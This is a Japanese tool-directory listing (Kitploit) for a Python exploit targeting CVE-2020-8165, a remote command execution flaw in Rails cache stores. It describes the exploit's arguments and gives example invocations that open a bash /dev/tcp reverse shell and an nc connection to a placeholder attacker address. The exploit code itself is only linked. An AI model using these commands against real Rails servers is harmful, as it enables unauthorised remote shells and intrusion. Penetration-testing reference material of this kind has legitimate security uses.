Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-8165 — CVE-2020-8165を対象としたPythonエクスプロイトで、RailsのMemCacheStoreとRedisCacheStoreを標的とします。argparseベースのインターフェースを使用して、ユーザー提供のオブジェクトのアンマーシャリングを介したリモートコマンド実行を可能にします。 | Kitploit
ツール/GitHubGitHub/hybryx/cve-2020-8165
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubhybryx/cve-2020-8165

CVE-2020-8165

CVE-2020-8165を対象としたPythonエクスプロイトで、RailsのMemCacheStoreとRedisCacheStoreを標的とします。argparseベースのインターフェースを使用して、ユーザー提供のオブジェクトのアンマーシャリングを介したリモートコマンド実行を可能にします。

リポジトリを見る
45年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-8165 Python Exploit

これはPython3を使用してCVE-2020-8165を悪用するコードです。このエクスプロイトはrails < 5.2.4.3、rails < 6.0.3.1で動作します。このエクスプロイトにより、攻撃者はMemCacheStoreおよびRedisCacheStoreにおいてユーザーが提供したオブジェクトをアンマーシャルすることができます。このエクスプロイトコードはArgParseを使用しており、ユーザーは非常に簡単にこの脆弱性を悪用できます。

使用方法

このエクスプロイトには5つの引数があります:

  • rHost - リモートのターゲットホストのIPアドレス
  • rPort - リモートのターゲットホストでRailsが動作しているポート番号
  • email - サービスにログインするために使用するメールアドレス
  • password - サービスにログインするためのアカウントのパスワード
  • cmd - 実行するコマンド。スペースを考慮して引用符で囲みます

例:

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

主なクレジット

元のCVE詳細:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 私が手を加え、ArgParseを追加したPastebinのエクスプロイトコード:https://pastebin.com/jpHpdBTk

ツールをダウンロード